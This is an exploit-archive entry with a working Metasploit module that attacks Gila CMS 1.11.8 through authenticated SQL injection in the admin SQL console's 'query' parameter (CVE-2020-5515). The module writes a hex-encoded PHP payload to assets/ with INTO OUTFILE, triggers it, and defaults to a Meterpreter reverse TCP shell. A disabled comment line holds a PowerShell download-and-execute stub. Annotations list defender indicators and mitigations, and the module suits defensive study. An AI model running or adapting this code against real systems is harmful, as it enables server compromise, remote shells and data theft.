Gila CMS 1.11.8 - 'query' SQL Injection(Metasploit)

2020.06.18
th3d1gger (TR)
Risk: High
Local: Yes
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require "net/http"
require "uri"
require 'nokogiri'

# Gila CMS authenticated SQL injection through the admin SQL console's "query"
# parameter (CVE-2020-5515), chained with MySQL INTO OUTFILE to write a PHP file
# into the install's assets/ directory and then request it. The Name/Description
# strings say 1.1.18.1 while the TARGETURI default and the advisory title say
# 1.11.8; the former looks like a typo but both are kept as the author wrote them.
#
# Defender notes, taken from the requests this module actually sends:
#   - an authenticated GET to <TARGETURI>/admin/sql?query=... whose query ends in
#     "INTO OUTFILE '<TARGETPATH>assets//<name>.PHP' LINES TERMINATED BY 0x..."
#     (the PHP body is hex-encoded);
#   - a new file assets/<6-15 alphanumerics>.PHP under the CMS install path;
#   - a follow-up GET to <TARGETURI>assets/<that file>.
#   Denying the MySQL FILE privilege (or setting secure_file_priv) and alerting on
#   .PHP files appearing under assets/ both break this chain.
class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking

  # HttpClient provides rhost/rport/peer/datastore; HttpServer::HTML and EXE are
  # only referenced by the commented-out download-and-execute variant below.
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Module metadata and options. USERNAME/PASSWORD are CMS admin credentials (the
  # injection is post-authentication). TARGETPATH is the server-side filesystem
  # directory the OUTFILE is written under, so it must match the victim's install
  # path; the default is a Windows XAMPP layout.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Gila CMS 1.1.18.1 Shell Upload ',
      'Description' => %q{ This module exploits sql injection vulnerability in "query" parameter that found on Gila CMS 1.1.18.1 . },
      'Author' => [ 'th3d1gger','Carlos Ramirez L. (BillyV4)' ],
      'References' => [ ['CVE', 'CVE-2020-5515'], ['PACKETSTORM', '158114'] ],
      'License' => 'MSF_LICENSE',
      'Platform' => 'PHP',
      'Arch' => ARCH_PHP,
      'Targets' => [ [ 'Automatic (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Type' => :php_memory, 'Payload' => { 'BadChars' => "'" }, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } ], ],
      'DefaultTarget' => 0 ))
    register_options( [
      OptString.new('USERNAME', [ true, 'Email to login with', 'user@gilacms.com']),
      OptString.new('PASSWORD', [ true, 'Password to login with', 'password']),
      OptString.new('TARGETURI', [ true, 'Uri for Gila CMS base', '/gila-1.11.8/']),
      OptString.new('TARGETPATH', [ true, 'Full Path to shell upload', "C://xampp3//htdocs//gila-1.11.8//"])#,
      ], self.class)
    # Options for the disabled hosted-payload variant, kept as in the original listing.
    # OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.0.1']),
    # OptInt.new('SRVPORT', [true, 'HTTP Server Bind Port', '4554']),
    # OptString.new('FILENAME', [true, 'Payload filename', 'payloader.elf'])
  end

  # No-op override of the HttpServer primer hook; presumably left over from the
  # hosted-payload variant, since nothing is served by this module as written.
  def primer
  end

  # Admin e-mail sent in the login POST.
  def username
    datastore['USERNAME']
  end

  # Admin password sent in the login POST.
  def password
    datastore['PASSWORD']
  end

  # Disabled HttpServer request handler from the download-and-execute variant.
  # def on_request_uri(cli, req)
  #   @pl = generate_payload_exe
  #   print_status("#{peer} - Payload request received: #{req.uri}")
  #   send_response(cli, @pl)
  # end

  # Runs the whole chain with raw Net::HTTP instead of the HttpClient mixin:
  #   1. GET <TARGETURI>/admin to pick up the initial Set-Cookie,
  #   2. POST username/password to the same URL and look for "Dashboard" in the body,
  #   3. hex-encode "<?php <payload> ?>" and submit it through /admin/sql?query=
  #      as a SELECT ... INTO OUTFILE under <TARGETPATH>assets//,
  #   4. GET <TARGETURI>assets/<written file> to execute it.
  # There is no explicit return value; `exploit` re-invokes this method and checks
  # its implicit result for nil. Datastore keys are read in lower case
  # ('targeturi', 'targetpath'), relying on the datastore being case-insensitive.
  def gila
    # Scheme is hard-coded to plain http; the SSL option is not consulted.
    uri = URI.parse('http://'+rhost.to_s+':'+rport.to_s+datastore['targeturi'].to_s+'/admin')
    http = Net::HTTP.new(uri.host, uri.port)
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    # Keep only the first Set-Cookie pair (up to the first ';') for the login POST.
    cookies = response.response['set-cookie']
    cookies = cookies.split(';')[0]
    request = Net::HTTP::Post.new(uri)
    request.set_form_data({"username" => username, "password" => password})
    request['Cookie'] = cookies
    request['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36'
    response = http.request(request)
    # Login success is inferred from the word "Dashboard" in the response body.
    if response && response.body.include?("Dashboard")
      # NOTE: this echoes the plaintext password into console/log output.
      print_good("yayayay! Authenticated with #{username}:#{password}")
      gsessionid = response.response['set-cookie']
      # rand(10)+6 gives 6..15 random alphanumerics; note the upper-case .PHP extension.
      @fname = "#{rand_text_alphanumeric(rand(10)+6)}.PHP"
      # NOTE(review): the next line appears as a single comment in the source listing
      # (a Windows PowerShell download-and-execute stub using srvhost/srvport/filename).
      # It is dead code here; `filename` is not defined anywhere in this module.
      #for windows php = "<?php shell_exec('powershell -c \"Invoke-WebRequest -Uri http://"+srvhost+":"+srvport.to_s+"/"+filename+" -OutFile "+ datastore['targetpath']+"assets//"+filename+ " \"'); shell_exec('"+datastore['targetpath']+"assets//"+filename+"') ?>"
      # Per the author's comment, the PHP wrapper is sent as a 0x... hex literal so the
      # console's strip_tags handling does not remove the '<?php' tags before MySQL
      # writes the file.
      #bypass strip_tags
      php = "<?php #{payload.encoded} ?>"
      php = php.each_byte.map { |b| b.to_s(16) }.join
      php = "0x"+php
      # The injection request: the admin SQL console's "query" parameter is sent as an
      # unencoded GET ending in INTO OUTFILE under <TARGETPATH>assets//. This request
      # line is the primary network indicator for this module.
      uri = URI.parse('http://'+rhost.to_s+':'+rport.to_s+datastore['targeturi'].to_s+'/admin/sql?query=SELECT id FROM user LIMIT 0,1 INTO OUTFILE \''+datastore['targetpath'] +"assets//"+@fname+'\' LINES TERMINATED BY '+php+'')
      request = Net::HTTP::Get.new(uri)
      # Both the pre-login cookie and the post-login session cookie are sent together.
      request['Cookie'] = cookies+';'+ gsessionid.split(';')[0]+';'
      request['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36'
      response = http.request(request)
      # The string 'Page created in' in the reply is used as the success oracle for the write.
      if response.body.include?('Page created in')
        # Disabled hosted-payload server from the download-and-execute variant.
        #resource_uri="/"+filename
        #start_service({'Uri' => {
        #  'Proc' => Proc.new { |cli, req|
        #    on_request_uri(cli, req)},
        #  'Path' => resource_uri
        #}})
        # print_status("#{rhost}:#{rport} - Trying Exploitation in 2 requests...")
        print_status("Payload uploaded")
        print_status("#{@fname}")
        print_status("#{peer} - Executing #{@fname}...")
        # Trigger: a fresh connection requests the written file from assets/ (note the
        # URL is TARGETURI + 'assets/' with no separator, so TARGETURI must end in '/').
        uri = URI.parse('http://'+rhost.to_s+':'+rport.to_s+datastore['targeturi'].to_s+'assets/'+@fname)
        http = Net::HTTP.new(uri.host, uri.port)
        request = Net::HTTP::Get.new(uri.request_uri)
        response = http.request(request)
        print_status("Payload is on #{uri} You can trigger it by yourself if it doesn't work.")
        # Disabled wait-for-shell from the hosted-payload variant.
        #print_status("#{srvhost}:#{srvport} - Waiting 1 minute for shell")
        # sleep(60)
      else
        print_status("Payload can not be uploaded")
        # Kernel#print rather than the module's print_* helpers: dumps the raw HTML to stdout.
        print response.body
      end
    else
      # print_status(response.body)
      fail_with(Failure::NoAccess, 'Credentials are not valid.')
    end
  end

  # Entry point. `gila` is invoked twice: once as a bare statement and again inside
  # the condition, so a run that does not raise performs the login/upload/trigger
  # chain twice; the nil test only observes the second invocation's implicit value.
  def exploit
    gila
    if gila.nil?
      fail_with(Failure::Unknown, 'Something went wrong!')
    end
  end
end

